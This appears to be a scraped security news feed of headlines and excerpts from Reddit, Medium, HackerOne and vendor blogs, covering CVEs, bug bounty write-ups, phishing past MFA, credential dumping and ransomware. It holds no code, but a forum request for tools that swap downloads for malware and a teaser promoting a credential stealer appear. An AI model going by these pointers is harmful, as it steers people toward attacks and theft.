    Hidden DNS resolvers and how to compromise your infrastructure Kaminsky style
    submitted by /u/The_Login [link] [comments]
    CVE-2022-41343 - RCE via Phar Deserialisation (Dompdf)
    submitted by /u/Gallus [link] [comments]
    Introducing Campaigns to MITRE ATT&CK
    submitted by /u/CyberMasterV [link] [comments]
    Releasing GitFive - Track down GitHub users by doing advanced investigation (usernames history, names variations, links between multiple identities, and more).
    submitted by /u/mxrchreborn [link] [comments]
    A Deep Dive of CVE-2022–33987 (Got allows a redirect to a UNIX socket)
    submitted by /u/csanders_ [link] [comments]
  • Open

    How I found `CVE-2022–40087`
    Simple College Website 1.0 was found to be vulnerable to an unauthenticated arbitrary file upload leading to remote code execution. Continue reading on Medium »
    Cloud Pentesting — AWS penetration testing guide for bugbounty hunters
    Note: before reading this article you need to have basic knowledge about AWS (Amazon Web Services) and its basic working mechanism and… Continue reading on Medium »
    Full Company Building Takeover
    Hello everybody, Most of the time you read about account takeover or infrastructure takeover, but did you hear before about Company… Continue reading on Medium »
    Mr. Robot: Self Xss from Informative to high 1200$ ,csrf, open redirect,self xss to stored
    Hello all bug bounty hunters, sorry for any mistake if I forget something; use this writeup for your RECON or your RESEARCHING. I found… Continue reading on Medium »
    WordPress Security
    What initially started as a blogging platform has turned into a lifesaver for many startups, companies, influencers, and bloggers. WordPress… Continue reading on InfoSec Write-ups »
    Azure Open Container $$$
    A nice story of hunting Continue reading on Medium »
    Error based SQL Injection with WAF bypass manual Exploit 100%
    Hey folks, Back again with SQL injection WAF bypass write-up, I’m gonna share what methodology I used to bypass the WAF block. Continue reading on Medium »
    How to properly enforce authorization
    Introduction Continue reading on InfoSec Write-ups »
  • Open

    Open Source Intelligence Tools and Techniques
    Previously, we discussed open source intelligence (OSINT) and the various information we can gather about people, institutions, and… Continue reading on Medium »
  • Open

    Remote Command Execution via Github import
    GitLab disclosed a bug submitted by vakzz: https://hackerone.com/reports/1679624 - Bounty: $33510
    SQL Injection through /include/findusers.php
    ImpressCMS disclosed a bug submitted by egix: https://hackerone.com/reports/1081145
    Path Traversal issue at https:///blaze/
    Sony disclosed a bug submitted by lu3ky-13: https://hackerone.com/reports/1320084
    SSRF on http://www./crossdomain.php via url parameter
    Sony disclosed a bug submitted by n0x496n: https://hackerone.com/reports/971590
    Blind SSRF in social-plugins.line.me
    LINE disclosed a bug submitted by sirleeroyjenkins: https://hackerone.com/reports/833758 - Bounty: $100
  • Open

    AD security audit tools
    Do you know any audit tools like PingCastle? submitted by /u/athanielx [link] [comments]
    As the new guy, how seriously should I be arguing to the rest of the team that having critical databases on the WS/SQL 2008R2 machines is a glaring vulnerability?
    I'm less than a month in at a new job as a networks/system analyst for a city government in California, so I don't want to rock the boat too much. I've previously done system administration, network administration, system engineering, etc. with a broad but shallow knowledge for a few county and state government agencies in a different state, so it's not like I'm learning the entire job from scratch, only the systems and applications unique to $NewJob. Almost all of the systems I'm taking over from the guy retiring in a few months are on 2012R2, fine whatever, it's still supported for another year. Bare minimum is fine with me. However, there's one machine on 2008R2 Enterprise with SQL Server 2008R2SP3 that had its databases migrated and supposedly offlined to an AWS instance six months a…
    What are the current data wiping standards for SSDs?
    /r/macsysadmin recommended also asking here. Original post Hey - I work for a relatively young organisation, and we're getting ready for our first major hardware refresh, replacing ageing 2018 MacBook Pros with M1 Airs. A lot of these MacBook Pros are still pretty usable (battery health is the main problem, no longer under warranty unfortunately) and it would be super wasteful to have them destroyed/recycled, so we're planning to let our employees take ownership of them if they wish (after signing a liability waiver and all that stuff to protect the company should the device burn their house down). What are the current standards for wiping SSDs to ensure no trace of company data remains? All our devices are encrypted via FileVault. I already wipe the volumes via Disk Utility when a device comes back to me. Is the combination of these two factors sufficient? Any data traces are encrypted and the recovery key wiped... I'm seeing mixed guidance regarding a 1x pass of random bit overwrites, 7x pass (DoD standard) overwrite, but I think this is obsolete for SSDs. I believe these can be performed via the 'diskutil secureErase' terminal command, but is this still a recommended method? Does anyone vouch for third party hard drive wipe software like BitRaser File Eraser? Apple's own guidance for donating or selling on old hardware is just to wipe via Disk Utility, but this probably doesn't take into consideration possible proprietary/company information on the device... Basically - how do you guys handle these situations in your own orgs? Much appreciated! submitted by /u/RhinoDuck [link] [comments]
    Password Managers are overrated. Change my mind
    Following is IMO. Let's face it, long and clunky passwords are MOSTLY not needed anymore. Why? Well, how do security breaches happen? How is someone getting hacked nowadays? Bruteforce? Nope. Social engineering. So why bother with a password manager and waaay too long passwords for anyone to remember? A lot of sites have 2FA, and the rest? Bruteforce protection, so why would I need to bother with way too long passwords if I can use a relatively simple one with special characters? Edit: Ok, I agree with you guys. For me a PM only made sense for having long and complicated passwords no one could remember. What didn't cross my mind is that it can also be used to store "reasonable passwords". Edit2: I knew my post wasn't gonna be popular or that many ppl would agree with it, that's why I wrote "change my mind", and so you did. But is that a reason to bomb my comments and post? submitted by /u/offron1 [link] [comments]
    Are there MITM malware injection tools for HTTP/HTTPS
    I know about methods and tools for capturing passwords and stealing cookies. Some tools allow on the fly SSL/TLS MITM attacks. Are there ready-made tools to substitute downloads with infected files in real time? For example, change the original PDF with a pre-made infected PDF or replace the ZIP file with an alternative ZIP containing malicious executable files. Thanks! submitted by /u/SecAbove [link] [comments]
    Achieve open redirect in this case:
    Any ideas how to achieve an open redirect in a case like this: --> request: ?return_to=google.com --> response: domain/google.com submitted by /u/rootcherryblossom [link] [comments]
    What to do when the red team member often triggered security alerts?
    Hello, I'm a member of the blue team, and I often see many alerts triggered by one red team member. The issue here is that he seemingly "pentested" targets out of scope. When I showed him the log, he said he did nothing at all although the log evidently showed his action with his IP address and his username (like "I went to lunch at that time, blah blah blah"). How do you usually respond to such a case? Thank you. submitted by /u/sanba06c [link] [comments]
    Some references of SSL bumping (or proxy without bumping) in a script?
    I recently confirmed that HTTP proxies can be created with low-cost web hosting. Me HTTP proxy (Python) Web hosting (PHP) On the Web gnh1201/php-httpproxy: HTTP proxy implementation with PHP socket (github.com) Now I want to implement an HTTPS proxy. However, it seems that HTTPS communication is not possible with a way to open the simple socket. I think I need some references on how I can perform SSL bumping. If there is a good reference, I would like to get a recommendation. Thank you. submitted by /u/gnh1201 [link] [comments]
  • Open

    SecWiki News 2022-10-06 Review
    No news updates today. For more of the latest articles, visit SecWiki
  • Open

    Vulnerability Exploitability EXchange – A Guide
    Article URL: https://www.rezilion.com/guides/vulnerability-exploitability-exchange-vex-a-guide/ Comments URL: https://news.ycombinator.com/item?id=33108564 Points: 2 # Comments: 0
  • Open

    Assorted directory (music, TV, NSFW)
    This directory is full of a random assortment of TV episodes and music, as well as numerous large-size NSFW videos. It fairly erratically goes online and offline, and appears to have some kind of throttling in place: https://84.42.206.118/localhost/stash/?C=S&O=A submitted by /u/JiminythecricketinOz [link] [comments]
  • Open

    WordPress Security
    What initially started as a blogging platform has turned into a lifesaver for many startups, companies, influencers, and bloggers. WordPress… Continue reading on InfoSec Write-ups »
    Bugcrowd — Tale of multiple misconfigurations!! ❌
    No content preview
    HTTP-HOST HEADER ATTACKS
    No content preview
    HackTheBox Canvas CTF Writeup
    No content preview
    Try Hack Me: Pickle Rick Walkthrough
    No content preview
    Hacking the WordPress sites for fun and profit | Part-1 [ Water ]
    No content preview
    How to properly enforce authorization
    Introduction Continue reading on InfoSec Write-ups »
    The Day I End-Up finding that Critical Database Info leaking on CM Cell(TN) Application
    No content preview
    Cloud Security Tooling Series : What the heck is a CWPP ?
    Understanding where CWPPs fit in the Cloud Security puzzle Continue reading on InfoSec Write-ups »
  • Open

    Cisco Hackery: Configuration File Download
    1.0 Intro Prior to making a career change to offensive security, I spent over 15 years working for a Cisco partner designing and implementing enterprise and VoIP networks. During that time, I performed best practice assessments aimed at identifying misconfigurations that could lead to a network compromise. Today, I have taken that knowledge and used... The post Cisco Hackery: Configuration File Download appeared first on TrustedSec.
  • Open

    Red Team Assessments
    Red Team Engagements are highly targeted assessments designed to take advantage of network sensitive data characteristics by utilising the… Continue reading on Medium »
    fzf — Fuzzy Finder
    fzf is a tool that provides an interactive filter and can help you a lot day to day; besides being fast, it can be used in… Continue reading on 100security »
  • Open

    Attack simulation tool based on CVE
    Hi Everyone, Hope you all are doing good. I am looking for a CVE based (not malware based) attack simulation tool in order to test my NIPS, so that I can check which attacks it is blocking and which it is not. Based on that I can create more signatures to detect those CVEs. The tool can be paid or open source, with regular updates on CVEs and their exploits. Please suggest any tool that will fulfill this requirement. Thanks in advance. submitted by /u/AnyYak5018 [link] [comments]
    Java Android Magisk Burp Objection Root Emulator Easy (JAMBOREE)
    submitted by /u/rmccurdyDOTcom [link] [comments]

  • Open

    No rate limit on subscribe form
    Yelp disclosed a bug submitted by happykira0x1: https://hackerone.com/reports/1708824
    IDOR - Delete technical skill assessment result & Gained Badges result of any user
    LinkedIn disclosed a bug submitted by sachin_kumar_: https://hackerone.com/reports/1592587 - Bounty: $1000
    PYTHON: CWE-079 - Add query for email injection
    GitHub Security Lab disclosed a bug submitted by jorgectf: https://hackerone.com/reports/1602237 - Bounty: $4500
    [JAVA]: Partial Path Traversal
    GitHub Security Lab disclosed a bug submitted by smehta23: https://hackerone.com/reports/1678405 - Bounty: $1800
    [Java]: CWE-625 - Query to detect regex dot bypass
    GitHub Security Lab disclosed a bug submitted by luchua: https://hackerone.com/reports/1690045 - Bounty: $1000
    [CPP]: Add query for CWE-297: Improper Validation of Certificate with Host Mismatch
    GitHub Security Lab disclosed a bug submitted by ihsinme: https://hackerone.com/reports/1710575 - Bounty: $1800
  • Open

    online tool for steganography and polyglot file creation/detection
    For anyone who may be a pentester, red team or blue team I'd like to ask and get feedback. Realistically, how useful would you find a web service or online tool that allows you to detect or create polyglot files or stego files? submitted by /u/guyWithKeyboards [link] [comments]
    lots of dns requests for higi.com
    20:26:16.861975 IP 177.222.232.141.53 > 10.0.0.149.53: 20991+ [1au] ANY? higi.com. (37) I have two different VPS servers in different regions, I have DNS servers on both of them, and I get thousands of requests for higi.com from Brazilian IPs... on both of them; this line is from tcpdump on port 53. What's wrong? Any help please? submitted by /u/mhmr81 [link] [comments]
    Domain Admin Security Training
    Can anyone recommend any security training (free or paid) that every domain admin should take/watch. submitted by /u/1hTD4eOyCrsJ [link] [comments]
    Wireshark: Security Risks When Installed on a Server?
    In terms of a living off the land attack vector, is having Wireshark installed on a server a significant security risk? submitted by /u/Wsz2020 [link] [comments]
    Do recruiters call back if i missed a call?
    I missed 4 calls from a recruiter. One at 12:00 and one at 2:00. I didn’t actually miss them, I was at the military base I serve in and touch phones aren’t allowed. I hate myself for not putting my SIM in a phone with keys instead. I am so pissed. This is like the 2nd time someone contacted me from infosec, and where I live there are no openings for many infosec jobs, and most don’t hire juniors. At one point I am saying that if it’s meant to be, they will call. But should I try messaging the HR on LinkedIn for example or try calling again tomorrow? I called today but they didn’t respond. submitted by /u/Ramseesthe4th [link] [comments]
    What should I use for an SPF record on a defensively parked domain?
    I need an SPF record for a parked domain. Is this what I should be using in this scenario? This domain will not be sending mail. v=spf1 -all Is there a better entry to add? submitted by /u/mtx4gk [link] [comments]
    LockBit 3.0 Ransomware Spam Mail Disguised as a Resume
    Cybersecurity researchers have released technical details and indicators of compromise associated with LockBit ransomware attacks through a case study. https://blog.criminalip.io/2022/09/23/lockbit-3-0-ransomware/ On Oct 01, 2022, we received an e-mail titled "Regarding Job" and the contents of the email indicated that this was intended as a job application. So here are the questions. Have you ever been hit with ransom? Did you pay the ransom? What's adequate preparation for a ransom attack? Actually, we receive over a hundred email job applications. So is it possible to prevent ransomware attacks by doing as stated in the case study article? What do you think? submitted by /u/Glad_Living3908 [link] [comments]
  • Open

    What is OSINT?
    OSINT means Open Source Intelligence and it is a means of gathering data. Continue reading on Medium »
    Dedemocratizing social media: the case of Russian Telegram channels
    Social media offers to chance to speak truth to power. I look at a way this has been dealt with by one Russian state-backed news agency. Continue reading on Medium »
  • Open

    TCU Live: 2022OCT04 (latest release)
    The latest version of "TCU Live" (2022OCT04) has been released. It's running the latest Debian sid packages, Linux kernel, and third party packages such as the Tor Browser, checkra1n, volatility, guestmount, git, etc. See the README in the link for more information: https://drive.google.com/drive/folders/0B8zx3qPcj9rJVjJrcnB4aXl1VG8?resourcekey=0-gjI_o4MHtiCvsjet9TCygw&usp=sharing It's built to be fairly lean and extensible and is great for in-house forensics, OSINT, field work, or if you just need to quickly spin up a Linux box. If you are looking for something that'll boot on almost all x86-64 (AMD64) hardware give it a shot and DM me if you have any comments or issues. submitted by /u/atdt0 [link] [comments]
    TCU Passware (2022OCT04)
    The latest "TCU Passware" (2022OCT04) has been released. This live distro automatically initializes the Passware Linux agent and adds it to your Passware cluster. It includes an SSH server (u:user, p:live) so you can log in to debug the agent if required. It also has hashcat included, so if you stop the Passware Linux agent you can use it for direct hashcat jobs. See the README.pdf for more info. https://drive.google.com/drive/folders/1BChc2kbErGPOFrDnvC8EO55PIWnuL-vX submitted by /u/atdt0 [link] [comments]
    TCU Hashtopolis (2022OCT04)
    The latest "TCU Hashtopolis" (2022OCT04) has been released. This live distro automatically initializes the Hashtopolis Linux agent and adds it to your Hashtopolis cluster. It includes an SSH server (u:user, p:live) so you can log in to debug the agent if required, which can be particularly helpful when a Hashtopolis task fails to benchmark your agent and the agent pulls itself out of the cluster. It also has hashcat included, so if you stop the Hashtopolis Linux agent you can use it for direct hashcat jobs. See the README.pdf for more info. https://drive.google.com/drive/folders/1xkDBNCr-KBg8FTMvTc70sxm0nr-6qYCG?usp=sharing submitted by /u/atdt0 [link] [comments]
    Wire Transfer Scam w/ AnyDesk
    Good morning, We've recently come across a case where an elderly female was caught in the middle of a scam that consisted of a spoof caller stating that they were from Norton Anti-Virus. Our victim allowed the user to install "AnyDesk" connection service(s) on their laptop and phones. They then convinced the victim to do 5 wire transfer transactions totaling $700,000. Obviously I'm sure the suspects behind this were using VPNs, but is there any way to gather IP addresses or data to see who connected to her devices to begin tracking? submitted by /u/JBettz [link] [comments]
    What is your workflow for IIOC cases?
    What's everyone's usual workflow? View extracted images, check internet history for related terms or relevant material, shellbags, link files, recent, etc. Is there anything else I can find useful info in? Just curious as to what everyone else is doing! submitted by /u/addiosamigo [link] [comments]
    HDD Password Toshiba
    Hello, I have a Toshiba laptop whose HDD I can't image with FTK. Only zeros with a software write blocker. With a hardware write blocker you don't see the drive. If you boot the system there is the info: Input HDD password. I think it's a firmware password. Any suggestions? Is there a tool that shows if it is so? submitted by /u/Civil_Structure_1033 [link] [comments]
    Dissect enables you to go from acquisition of thousands of systems to answering the how, when, and what in a matter of hours – a game changer for incident response teams. Its modular and concise API allows anyone with Python experience to adapt it to their own needs and create output ..
    submitted by /u/digicat [link] [comments]
  • Open

    Fuzzing Trackmania Nations Forever for RCE
    Article URL: https://blog.bricked.tech/posts/tmnf/part1/ Comments URL: https://news.ycombinator.com/item?id=33099312 Points: 22 # Comments: 0
  • Open

    SecWiki News 2022-10-05 Review
    Building ModSecurity into a Java application to implement first-generation RASP by ourren. For more recent articles, visit SecWiki
  • Open

    Vulnerability Exploitability EXchange (Vex) – A Guide
    Article URL: https://www.rezilion.com/guides/vulnerability-exploitability-exchange-vex-a-guide/ Comments URL: https://news.ycombinator.com/item?id=33096473 Points: 2 # Comments: 1
  • Open

    Cloud Security Tooling — What does a CIEM do exactly ??
    One more cloud abbreviation to understand Continue reading on InfoSec Write-ups »
    Ransomware Attacks — Current Trends and Protection Strategies
    No content preview
    TryHackMe: OhSINT Room Write-Up [No Answers]
    No content preview
  • Open

    Fuzzing Trackmania Nations Forever for RCE
    submitted by /u/rdjgr [link] [comments]
    dirsearch - release v0.4.3 - crawling supported
    submitted by /u/maurosoria [link] [comments]
    Pixel 6 bootloader: Emulation, ROP
    submitted by /u/jeandrew [link] [comments]
    A New Supply Chain Attack on PHP
    submitted by /u/Gallus [link] [comments]
    Wireshark 4.0.0 has been released
    submitted by /u/Fugitif [link] [comments]
  • Open

    Ghauri — advanced cross-platform tool
    An advanced cross-platform tool that automates the process of detecting and exploiting SQL injection security flaws Continue reading on Medium »
    The Day I End-Up finding that Critical Database Info leaking on CM Cell(TN) Application
    As you have read the title, Yes! Karthikeyan. V the guy who was testing the CM Cell application and fortunately found the tipping point… Continue reading on InfoSec Write-ups »
    How I Found A P1 Bug
    Hi, Continue reading on Medium »
    Hacking the WordPress sites for fun and profit | Part-1 [ Water ]
    Hello folks, I am Krishna Agarwal (Kr1shna 4garwal) from India 🇮🇳. An ordinary bug hunter and so-called security researcher :) Continue reading on InfoSec Write-ups »
    OAUTH MISCONFIGURATION LEADS TO PRE ACCOUNT TAKEOVER
    Hello everyone!! ☺️ Continue reading on Medium »
  • Open

    Security researchers share LockBit 3.0 ransomware technical details and defense tips in a case study.
    submitted by /u/Late_Ice_9288 [link] [comments]
  • Open

    How to Secure & Harden Your Joomla! Website in 12 Steps
    At Sucuri, we’re often asked how website owners and webmasters can secure their websites. However, advice can often be too broad; different content management systems (CMS) exist in this ecosystem and each require a unique security configuration. That’s exactly why the Sucuri Firewall contains an application profiling engine that adapts to the CMS and regular website traffic patterns to identify signs of a threat. With that in mind, today we’re covering some of the steps to secure a Joomla! Continue reading How to Secure & Harden Your Joomla! Website in 12 Steps at Sucuri Blog.

  • Open

    Threat Brief: CVE-2022-41040 and CVE-2022-41082: Microsoft Exchange Server (ProxyNotShell)
    CVE-2022-41040 and CVE-2022-41082 (aka ProxyNotShell) can be used for remote code execution. Read our analysis and suggestions for how to mitigate. The post Threat Brief: CVE-2022-41040 and CVE-2022-41082: Microsoft Exchange Server (ProxyNotShell) appeared first on Unit 42.
  • Open

    Improving Asset Visibility and Vulnerability Detection on Federal Networks
    Article URL: https://www.cisa.gov/binding-operational-directive-23-01 Comments URL: https://news.ycombinator.com/item?id=33088508 Points: 1 # Comments: 0
  • Open

    I have an interesting virus and looking to stop it
    Lately my PC got infected by a virus. It starts automatically when the PC boots and uses my network, CPU, and memory: it launches a command prompt process and I can see it eating my resources. In order to fix it I started by blocking the ports that this process is using, and I'm looking forward to completely shutting it down. Any recommendation on how to find out what exactly kicks off that process? And maybe how to remove it or something. Would appreciate any help. (Interesting fact: when I open Task Manager the virus slows down using my PC's resources, and once I close Task Manager it resumes eating my resources again haha) Thanks submitted by /u/Divarello [link] [comments]
    How is forensic analysis (disk/memory clone) done during an ongoing attack without the attacker knowing?
    In episodes of Darknet Diaries, incident responders often say one of the first things they do is grab an image of the disk and memory on a compromised system. To me it seems like the only way to do this reliably would be an offline/cold clone, but they almost always indicate they do it on the live system. Maybe I’m overestimating the attacker or how advanced malware is, but I’m thinking if I were the attacker I could do things to hide. Detect if any common disk/memory dump tools get run and kill them, interfere with them, or temporarily hide. Add hooks into the OS system calls involved in dumping files/disk/memory, like if you hijack the OS call that lists files, takes a snapshot, or reads system-wide memory outside of your process, then your files and data wouldn’t show up in a dump from a live system. Run some kind of SIEM-style log collection to alert when “indicators of response” are present. Obviously not storing logs, but alerts could still be sent off to the attacker to say something is up. Or are there pressures acting against this? Like, is it the case that there’s a cost to all of these evasive cloaking measures, and if too much is done then they risk raising a red flag? Like maybe laying low is more effective than some super advanced persistence attempt? submitted by /u/PlausibleNinja [link] [comments]
    Is it okay to use the built-in password manager on Android devices? It’s very convenient and works better than Bitwarden, especially when offering to save new passwords.
    Is it okay to use the built-in password manager on Android devices? It’s very convenient and works better than Bitwarden, especially when offering to save new passwords. submitted by /u/Bored-Giraffe [link] [comments]
    Can my employee spy on me or check my location over MS Teams?
    Hello guys. We have a new rule that allows us to work from anywhere in the EU. I thought about traveling around and working from Spain, France and Greece. My company allowed it but my boss says I shouldn't be too far away in case he needs me. This is a bad excuse since the last time I was in the office was 3 months ago. Even from Spain I could be there the next day whenever he calls me, but he said I should stay in my own country and travel around. My question is: Would he or the IT department be able to see where I am working from? submitted by /u/Lee63225 [link] [comments]
    Are there any password managers for the browser that supports biometric login on each login and not just the master password?
    I have tried 1Password and read the documentation on Bitwarden. I would like to know if there is any password manager that supports using biometric login each time I try to log in and not just the master vault login. submitted by /u/0OOO00000OO00O0O0OOO [link] [comments]
    Migrate to blockchain security or continue on the traditional web?
    I currently work as a security engineer at a startup and around here I have room to develop and grow in terms of blockchain security. But I don't know if that's a certainty for the future; I mean, I don't know how this whole blockchain thing is going to develop in the next few years. I am new and have a short career (2 years), so I come to ask if I should continue studying what I already do (traditional web hacking) or if I should migrate to blockchain security studies. And furthermore, what do you guys think about blockchain security? My biggest motivator for asking this question is, in addition to already being inserted in an environment that uses blockchain, also because great security minds are migrating to this blockchain security market (e.g. https://pwnednomore.org/). Thanks. submitted by /u/Born_Barnacle3417 [link] [comments]
  • Open

    Geolocating a Protest in Sweden
    On September 30, 2022 an explosion, reportedly caused by a deliberate attack, inside Kaj Educational Center in the Afghanistan capital of… Continue reading on The Sleuth Sheet »
    CHALLENGE STATUES
    Challenge posted on TWITTER on 29/09/2022. You will find the solution below. Continue reading on Medium »
  • Open

    Dissect: An incident response game-changer
    submitted by /u/CyberMasterV [link] [comments]
    imaging a MacBook...
    I have a client shipping me a Mac tomorrow but we don't have MacQuisition. I just got my shop to upgrade to Magnet Axiom Cyber, but it doesn't seem to do a physical image. I can probably deal with logical if needed. But I was wondering if I could image it with Paladin and unlock and process it in Axiom, kind of like I used to do when my last shop had BlackLight. Also, has anyone tried using the Remo imaging on an external network? They mainly tout using this for internal investigations but we work with clients. submitted by /u/Inevitable_Logging [link] [comments]
  • Open

    pirebok - an adversarial fuzzer
    submitted by /u/c0daman [link] [comments]
    MSSQL, meet Maggie - a novel backdoor for MSSQL servers.
    submitted by /u/OwnPreparation3424 [link] [comments]
    Matano - Open source cloud native security lake built with Arrow2 + Rust
    submitted by /u/shaeqahmed [link] [comments]
    Secure your machine learning with Semgrep
    submitted by /u/Khryse [link] [comments]
  • Open

    Get The Superior Cloud Penetration Testing Services in USA, Israel, And UK
    Today, security professionals use website penetration testing to check the integrity of cyber systems and assets. The testing is essential… Continue reading on Medium »
    Red Teams and Blue Team: True or False Friends?
    Seneca wrote a letter discussing what he felt the word friend meant: Continue reading on Medium »
  • Open

    SecWiki News 2022-10-04 Review
    Serverless security revealed: architecture, risks and protective measures by 路人甲; IDOR-related research by 蓝色淡风. For more recent articles, visit SecWiki
  • Open

    WeFuzz secures seed funding to bring decentralized auditing and bug bounty platform to Web3
    Crowdsourced security audit and bug bounty platform WeFuzz today announced funding from Druid Ventures to advance its fully decentralized… Continue reading on Medium »
    Step 21: SQL Injection Fundamentals
    SQLi my old friend… honestly I'm hoping to run through this module fairly quickly. I did a Udemy course on SQL databases after struggling… Continue reading on Medium »
    Blueshift DEX on the Milkomeda Algorand A1 Testnet
    It’s fair to say that I have always been waiting for a Blueshift integration with any of the top blockchains (outside of Cardano) like… Continue reading on Medium »
    ML Wallet Vulnerability
    Disclaimer: The purpose of this research is to improve and strengthen security; all issues discovered in this research are reported to the… Continue reading on Medium »
    Learning Basics: Over The Wire (Bandit -> Level 1 → Level 17)
    I know it’s been way too long, since I wrote an article. I was just too busy with my studies. Anyway, lets jump right in. I started this… Continue reading on Medium »
    Bugcrowd — Tale of multiple misconfigurations!! ❌
    Welcome to this new article. This article is a story about misconfigurations found on a domain. Since it is a private program let’s call… Continue reading on InfoSec Write-ups »
    Interview: PinkDraconian
    Intigriti hacker manager and content creator Continue reading on Medium »
    FFUF Intermediate Part Two
    This is the second part for ffuf usage. In the first part of the tool we have discussed about installation and some basic usage of it. If… Continue reading on Medium »
  • Open

    Prioritize vulnerability assessment more easily with these simple steps— and intelligence—from Secunia Research
    The cost of an exploited vulnerability due to a cyberattack can be devastating to your business. Your confidential information, intellectual property, and employees are the valuable data points that make up your brand and must be protected. According to Forbes, cybercrimes are at an all-time high, with external hackers being linked to 93 percent of reported cases. Simply focusing on patching the most common vulnerabilities is not enough and can leave you exposed to potential attacks. While running a successful business, it can feel overwhelming and impossible to know everything. However, with Flexera's software vulnerability management solutions, you don't have…
  • Open

    Common Conditional Access Misconfigurations and Bypasses in Azure
    Conditional Access is widely used in Azure to prevent unauthorized access. When it works, it can shut down attacks, even if the user’s password is known. However, it doesn’t always work as intended. For this blog post I wanted to provide an in-depth look at common Conditional Access configurations in Azure, along with potential bypasses.... The post Common Conditional Access Misconfigurations and Bypasses in Azure appeared first on TrustedSec.
  • Open

    Phish a User with MFA Enabled
    I took a look at EvilGoPhish and did a walkthrough. I was able to successfully phish my own Office 365 account with the Microsoft authenticator turned on. This is rather mind-blowing that it works and works this well. Take a look at my video if you are interested. Spearphishing a User with MFA Enabled submitted by /u/Infosecsamurai [link] [comments]
    Running Bloodhound on production - risks and considerations
    It's my first post here, hi everyone! I wanted to ask for your advice on running Bloodhound and not tearing the local AD apart. I used BH several times in the past during red teaming (never really broke anything lol), but in my current company we want to run ingestors regularly to fine-tune detection and have some attack paths ready for next exercises. Before we can do it, there needs to be some risk assessment performed with affected hosts and possible threats while running BH on production. Has anyone done anything like it before? How do you guys deal with the risks of running ingestors on production network? I tried reading the docs, but they're not too precise. I'm thinking of doing some labs to determine the impact first, but it's hard to compare a lab to a several-thousand-endpoint domain, right? ;) Please share any tips you have and stay red :) submitted by /u/l0r4q [link] [comments]
  • Open

    Bypass two-factor authentication
    Cloudflare Public Bug Bounty disclosed a bug submitted by ydvanjali: https://hackerone.com/reports/1664974 - Bounty: $250
  • Open

    A beginner's guide to dumping Lsass.exe & SAM
    Internal network information gathering is an unavoidable hurdle in attack-defense exercises, and account passwords/hashes are the foremost target.
  • Open

    Radio, Audio, and other stuff
    https://www.wbai.org/audio/ https://www.bibletelling.org/btpress/audio/ https://eaec.org/mp3/ http://www.creative-wisdom.com/radio/ http://media.sbc.sc/ftproot/ https://www.pastorsstudy.org/radio/2008/ https://www.pastorsstudy.org/radio/2009/ https://thesummit.fm/330V1_wav/ The number after the V can be changed from 1 to 6 https://www.roguefolk.bc.ca/media/ https://www.aquarius-publishing.com/RADIO/ http://mesamike.org/radio/mwdx/audio/ https://www.sgo.fi/pub_vlf/ http://otrrlibrary.org/OTRRLib/ https://www.burnttoastvinyl.com/radio/media/ https://www.antp.org.mx/radio/ http://kruljo.radiostudent.si/mp3/ Misc https://www.sgo.fi/pub_vlf/ http://www.princeton.edu/~ssato/ https://www.hueylong.com/audio/ http://gamekill.cz/cstrike/ https://www.mscperu.org/tv_medioscom/ http://www.africa.uga.edu/Kiswahili/doe/media/ https://ftp.txdot.gov/pub/ submitted by /u/ilikemacsalot [link] [comments]

  • Open

    Modifying ettercap Plugin (IEC 60870-5 )
    If anyone is quite versed in the IEC 60870-5 protocol, please DM. Thanks. submitted by /u/CleanCryptographer8 [link] [comments]
    SIEM/Honeypot training environment
    I'm volunteering in an after-school cybersecurity club and wanted to get some teenagers exposed to SIEM and general forensics. I was thinking of running a SecurityOnion instance and honeypot on Amazon and then using that, or would you have any better suggestions? submitted by /u/spokale [link] [comments]
    CIS CSC but for ransomware preparedness
    Hi Reddit, I've conducted several CIS/CSC assessments utilizing the AuditScripts risk register. I'm looking for something similar but more focused on a lightweight BIA for ransomware. Any thoughts? submitted by /u/ruarchproton [link] [comments]
    What is DLL sideloading? A common technique explained
    What is DLL sideloading? A common technique that often relies on signed libraries from popular vendors. We have a new tech explainer on how it works, its benefits for threat actors, and the difference between active and passive exploitation. https://businessinsights.bitdefender.com/tech-explainer-what-is-dll-sideloading submitted by /u/MartinZugec [link] [comments]
    How to Setup SSH on first boot for Kali-Raspberry Pi
    I don't have an external keyboard/mouse and a monitor. I want my Kali to be accessed via SSH on the first boot after installation on the SD card. I saw a video mentioning how to create the ssh file and the wpa_supplicant.conf file, but it was not very informative on how exactly to do that. Thank you in advance for helping! submitted by /u/Kidbu65 [link] [comments]
  • Open

    BlackHat MEA CTF 2022 — Forensic (Mem)
    Introduction Continue reading on Medium »
    CSRF Attack — 0 click account delete - 1st write-up
    I am Deepak. I started bug bounty 5–6 months ago. I am a noob in this field; correct me if you find something wrong in this post. Continue reading on Medium »
    Agent Stealer
    many been asking me for this powerful stealer lately Continue reading on Medium »
    MY FIRST AND SECOND BUGS ARE — 2FA BYPASS
    Hey there guys, Continue reading on Medium »
    API’s Security-All in One
    Hello everyone :) Continue reading on Medium »
    Getting into InfoSec and Cybersecurity
    A shorter, less intimidating list of infosec resources helpful for anyone trying to learn. Continue reading on Medium »
    Open map of sql : Complete Sqlmap guide
    Understanding the complete sqlmap tool very easily in just a few minutes (can be used as a Sqlmap cheatsheet). Continue reading on Medium »
    Exploiting Insecure Deserialization for Fun
    Hey squad, let’s Hack! Continue reading on Medium »
    Taebit’s first bug bounty program ended with a success
    Thank you all the AstroNuts 👨‍🚀👩🏻‍🚀🧑🏽‍🚀 Continue reading on Medium »
  • Open

    Fuzzing Solidity Smart Contracts with Echidna: Die-Hard Level Tips
    In this series we will focus only on those aspects that can be really useful for auditing and bug bounty hacking! Continue reading on Pessimistic Security »
  • Open

    SecWiki News 2022-10-03 Review
    Self-supervised contrastive learning in code retrieval and summarization by ourren; SecWiki Weekly (Issue 448) by ourren; A brief analysis of the 洞态 (DongTai) IAST product by ourren; DeFiHackLabs: Reproduce DeFi hack incidents using Foundry by ourren; Awesome-web3-Security: A curated list of web3Security materials and resources by ourren; Havoc: an extensible post-exploitation C2 framework by ourren. For more recent articles, visit SecWiki
  • Open

    Reddit talk promotion offers don't expire, allowing users to accept them after being demoted
    Reddit disclosed a bug submitted by ahacker1: https://hackerone.com/reports/1656380 - Bounty: $1000
    Jira information disclosure
    Informatica disclosed a bug submitted by isumitpatel: https://hackerone.com/reports/994612
  • Open

    When Athletic Abilities Just Aren't Enough - Scoreboard Hacking Part 3
    submitted by /u/mdulin2 [link] [comments]
  • Open

    Credential Stuffing Attack: Countermeasures using Patterns and Machine Learning
    No content preview
